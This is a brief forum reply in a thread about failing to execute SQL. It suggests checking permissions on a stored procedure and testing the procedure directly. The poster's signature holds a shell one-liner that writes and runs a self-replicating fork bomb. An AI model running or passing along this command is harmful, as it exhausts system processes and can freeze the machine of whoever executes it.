in reply to Re: Re: Can't execute sql
in thread Can't execute sql

Check the the user running the script has correct rights to run the stored proc?

Try some test cases against the stored proc?

ibanix $ echo '$0 & $0 &' > foo; chmod a+x foo; foo;